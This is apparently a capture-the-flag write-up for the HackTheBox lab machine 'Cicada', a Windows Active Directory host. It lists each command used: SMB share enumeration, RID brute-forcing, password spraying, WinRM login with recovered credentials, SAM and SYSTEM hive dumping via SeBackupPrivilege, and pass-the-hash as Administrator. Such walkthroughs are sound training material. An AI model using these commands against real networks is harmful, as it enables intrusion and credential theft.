Skip to main content

HTB: Cicada

Table of Contents

Summary
#

Cicada is a Windows host with your typical Active Directory services running. This box relied on lots of enumeration on the SMB shares and Domain user’s description field to finally reach the user flag. To get the system flag, I used the user’s SeBackupPrivilege to elevate my privileges.

User flag
#

Information gathering
#

Nmap
#

sudo nmap -sV -O 10.129.248.46

The Nmap scan showed the standard opened ports for an Active Directory DC. Also, port 5985 is usually an indicator of WinRM being enabled.

SMB
#

By listing the shares, I identified the HR share with READ permissions for the guest user.

nxc smb 10.129.248.46 -d cicada.htb -u 'guest' -p '' --shares

Downloading the files to my machine to analyze them using the spider_plus module.

nxc smb 10.129.248.46 -u guest -p '' -M spider_plus -o DOWNLOAD_FLAG=True

In the downloaded files, there’s a Notice from HR.txt text file that contains the default password for new hires.

Now I just needed to list the users from cicada.htb to hopefully find one that still uses the default password.

To find existing users I bruteforced the RID’s.

nxc smb 10.129.248.46 -d cicada.htb -u cicada -p '' --rid-brute

Then I could use that list of users to do some password spraying.

nxc smb 10.129.248.46 -d cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

The user michael.wrightson still has the default password. I could then use that account to further enumerate the domain and eventually found the user david.orelious with his password inside the Description field.

nxc smb 10.129.248.46 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

By doing enumeration with that new user, I gained access to the share DEV which contained a PowerShell script called Backup_script.ps1.

xc smb 10.129.248.46 -d cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus -o DOWNLOAD_FLAG=True

The script contained hard-coded credentials for another user called emily.oscars.

Exploitation
#

Evil-WinRM
#

With that new user, I directly tried to connect to the host.

The connexion was successful and from there I could get the user flag on the Desktop.

evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i 10.129.248.46

System flag
#

Information gathering
#

User privileges
#

Once conncected with user emily.oscars, I listed her privileges.

SeBackupPrivilege is a well-known Windows privilege that can be exploited to gain elevated privileges.

Exploitation
#

SeBackupPrivilege
#

I saved the SAM and SYSTEM registry hives and downloaded them.

reg save hklm\sam sam.hive; reg save hklm\system system.hive
download *

I then used secretsdump.py to dump the NTLM hashes.

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Using the obtained Administrator hash, I connected to the host and obtained the system flag.

evil-winrm -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -i 10.129.248.46